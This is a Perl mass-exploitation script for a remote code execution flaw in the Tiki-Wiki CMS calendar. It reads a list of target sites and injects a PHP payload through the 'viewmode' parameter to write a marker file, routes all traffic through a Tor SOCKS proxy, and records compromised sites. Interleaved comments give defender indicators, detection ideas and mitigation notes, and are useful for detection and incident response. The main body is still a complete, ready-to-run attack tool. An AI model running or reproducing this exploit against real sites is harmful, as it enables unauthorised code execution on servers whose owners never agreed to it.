- #!/usr/bin/perl
- # ->Coder By CrashBandicot
- #
- # Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution
- # discovery by Dany Ouellet
- # ref: https://www.exploit-db.com/exploits/39965/
- use LWP::UserAgent;
- use LWP::Protocol::socks;
- use HTTP::Request::Common;
- # Purpose (as visible in this listing): read base URLs, one per line, from the
- # file named in $ARGV[0]; for each, send one GET to /tiki-calendar.php with a
- # crafted "viewmode" value, then GET /hacker.txt to see whether a marker file
- # appeared. URLs where the marker is seen are appended to savetiki.txt.
- #
- # Defender notes -- indicators present in this code:
- #   * request path /tiki-calendar.php with a viewmode value containing an
- #     encoded quote (%27) followed by PHP calls (fopen / fwrite / fclose);
- #   * a file "hacker.txt" in the web root containing "by hacker";
- #   * an immediate follow-up GET for /hacker.txt from the same client;
- #   * the fixed Firefox/3.5 User-Agent string set below.
- # Mitigation: apply the vendor fix for the issue referenced in the header
- # (exploit-db 39965). NOTE(review): confirm against the vendor advisory which
- # of the releases named in the header are affected and which are fixed.
- #
- # Clears the terminal; the command is chosen by OS name.
- if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
- print "
- Tiki Mass Explo!ter RCE
- by CrashBandicot
- Usage : $0 list.txt
- \n";
- # Opens the list file; the script dies with the OS error if it cannot be read.
- open(tarrget,"<$ARGV[0]") or die "$!";
- while(<tarrget>){
- chomp($_);
- # Each line is used as-is as the base URL for both requests below.
- $webs = $_;
- print " [+] Scanning -> $webs";
- # URL-encoded viewmode value: a quote and semicolon, then PHP statements that
- # would write the string "by hacker" to hacker.txt, then a trailing assignment.
- # Detection: presumably legitimate viewmode values are short view names --
- # alert on quotes, semicolons or "fopen" in this parameter (confirm the
- # expected values against Tiki itself).
- $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27';
- $ua = LWP::UserAgent->new();
- # All HTTP/HTTPS traffic goes through a local SOCKS proxy. 9150 is the Tor
- # Browser default SOCKS port, so the source address in server logs is likely
- # a proxy exit and is unreliable for attribution or per-IP blocking.
- $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150');
- $ua->timeout(30);
- # Static User-Agent; usable as a weak log-hunting pivot, not as a sole signal.
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
- # The response to the first request is stored but never inspected.
- $fuck = $ua->get($webs.$payload);
- $def = $webs."/hacker.txt";
- $check = $ua->get($def)->content;
- # Success is inferred only from the substring "hacker" appearing anywhere in
- # the second response body. For incident response: an entry in savetiki.txt
- # is therefore not proof of compromise (an error page echoing the requested
- # path would also match) -- verify the file on disk and the access logs.
- if($check =~/hacker/) {
- print "\n\n [+] File Uploaded >> $def\n";
- # Appends the hit to savetiki.txt in the current directory; open is unchecked.
- open(save ,">>savetiki.txt");
- print save "$def\n";
- close save;
- } else { print "\n [-] File Upload Fail\n"; }
- }